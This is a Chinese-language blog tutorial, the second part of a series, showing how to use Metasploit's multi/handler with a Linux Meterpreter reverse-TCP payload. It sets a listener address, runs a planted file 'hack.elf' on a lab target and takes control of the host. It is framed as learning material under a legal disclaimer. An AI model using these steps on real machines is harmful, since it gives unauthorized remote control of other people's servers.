当前位置:网站首页>网络安全工程师演示:原来***是这样控制你的服务器的!(下)

网络安全工程师演示:原来***是这样控制你的服务器的!(下)

2020-11-10 07:39:17 osc_a8r2ub9u

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Linux的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 启动Metasploit(msf)***测试框架,如下图所示。
命令1:msfconsole
在这里插入图片描述













步骤1:利用相应的漏洞利用模块,如下图所示。
命令2:use exploit/multi/handler
在这里插入图片描述

步骤2:查看漏洞模块对应的参数,如下图所示。
命令3:show options
在这里插入图片描述

步骤3:设置对应的payload方便后续***,如下图所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

步骤4:查看该漏洞模块的相关参数,如下图所示。
命令:show options
在这里插入图片描述

步骤5:设置对应的参数,如下图所示。
命令:set lhost 193.168.78.169
在这里插入图片描述

步骤6:查看配置的参数是否成功,如下图所示。
命令:show options
在这里插入图片描述

3.2 运行***文件,如下图所示。
步骤1:给***文件赋予执行权限,如下图所示。
命令:chmod +x hack.elf
在这里插入图片描述


步骤2:执行***文件,如下图所示。
命令:./hack.elf
在这里插入图片描述

3.3 运行漏洞利用模块,如下图所示。
命令:run
如下图所示,成功拿下目标主机。
在这里插入图片描述


查看目标主机的文件系统信息,如下图所示。
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!


版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4285472/blog/4710443